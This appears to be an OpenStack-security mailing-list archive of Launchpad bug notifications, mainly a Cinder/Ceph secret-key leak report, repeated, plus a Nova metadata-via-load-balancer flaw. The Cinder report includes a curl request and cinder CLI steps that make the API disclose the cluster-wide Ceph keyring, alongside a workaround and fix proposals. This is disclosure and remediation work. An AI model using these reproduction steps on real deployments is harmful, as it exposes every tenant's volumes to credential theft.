Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From gagehugo at gmail.com Thu Oct 31 15:28:12 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Thu, 31 Oct 2019 15:28:12 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157253569375.19346.16448407373152762427.launchpad@wampee.canonical.com> ** Changed in: ossn Status: Confirmed => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: In Progress Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. 
As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) 
should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1849624 at bugs.launchpad.net Thu Oct 31 18:53:07 2019 From: 1849624 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 18:53:07 -0000 Subject: [Openstack-security] [Bug 1849624] Fix proposed to cinder (master) References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157254798767.2581.7956261386549652544.malone@gac.canonical.com> Fix proposed to branch: master Review: https://review.opendev.org/692428 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: In Progress Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). 
Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1841933 at bugs.launchpad.net Thu Oct 31 19:47:04 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 19:47:04 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <157255122691.27964.1132765436268433555.launchpad@chaenomeles.canonical.com> ** Changed in: nova Assignee: Adit Sarfaty (asarfaty) => Kobi Samoray (ksamoray) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions
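
The failure mode described in this last report, where an empty subnet lookup lets the metadata service fall back to matching ports by IP address alone, suggests a simple defensive check. The sketch below uses hypothetical helper names and is not the actual Nova fix; a real service would translate these errors into 4xx responses rather than serving another instance's metadata:

def instance_for_lb_metadata_request(neutron_api, provider_id, instance_ip):
    # neutron_api stands in for the real Neutron client wrapper.
    subnet_ids = neutron_api.subnet_ids_for_metadata_provider(provider_id)

    if not subnet_ids:
        # Refuse to answer rather than matching ports by IP address alone,
        # which could return a port (and keys/user-data) belonging to a
        # different tenant's instance that reuses the same fixed IP.
        raise LookupError('no subnets found for provider %s' % provider_id)

    ports = neutron_api.ports_on_subnets(subnet_ids, ip_address=instance_ip)
    if len(ports) != 1:
        raise LookupError('expected exactly one port for %s, got %d'
                          % (instance_ip, len(ports)))
    return ports[0]['device_id']
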